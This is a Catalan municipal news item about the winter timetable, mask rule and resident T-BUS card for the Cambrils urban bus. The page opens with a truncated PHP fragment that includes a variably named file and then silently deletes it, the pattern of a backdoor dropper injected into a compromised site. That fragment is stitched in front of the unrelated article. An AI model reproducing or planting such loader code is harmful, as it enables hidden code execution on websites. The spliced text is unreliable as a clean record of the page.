");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> L’autobús urbà de Cambrils inicia el servei de la temporada d’hivern
Iconos cabecera

Destaquem

  • SEM 2021SEM 2021
    Setmana Europea de la Mobilitat 2021

L’autobús urbà de Cambrils inicia el servei de la temporada d’hivern (13/09/2021)

El bus urbà de Cambrils ha iniciat els horaris de la temporada d’hivern. El servei compta amb tres línies que possibiliten l’enllaç des dels barris als punts més generadors de mobilitat: L1 (la zona Llevant), L2 (la zona Ponent) i L3 (la zona centre).

L’horari de dilluns a divendres serà el pràcticament el mateix que la temporada passada exceptuant ajustos de temps puntuals. El servei dels dissabtes serà exactament igual que l’hivern passat. Com sempre, els dimecres al matí, amb motiu del mercadet ambulant, el bus no passarà per les parades Miŀlenari i Passeig Albert.

Tots els horaris i recorreguts es poden descarregar des del web: www.aparcam.cat. També es podran demanar els horaris en els punts habituals: Ajuntament i equipaments municipals, el Patronat de Turisme, a parades urbanes i als mateixos autobusos. A més als usuaris residents que disposen de la targeta T-BUS se’ls facilitarà la informació per correu electrònic.

Obligatorietat de l’ús de la mascareta

Per tal de preservar la seguretat, s’estableix l’obligatorietat de la mascareta per poder fer ús del transport urbà de Cambrils.

Targeta T-BUS per als residents

La targeta de Cambrils T-BUS per a residents permet fer tants viatges com es vulgui amb els autobusos urbans fins a finals d’any. Es pot obtenir a l’Oficina d’Atenció a la Ciutadania de l’Ajuntament i té un cost de 10 euros anuals.

Font: Ajuntament de Cambrils

L’autobús urbà de Cambrils inicia el servei de la temporada d’hivern

[Tornar a Notícies]

 
Carrer d' Anselm Clavé, 1 43004 - Tarragona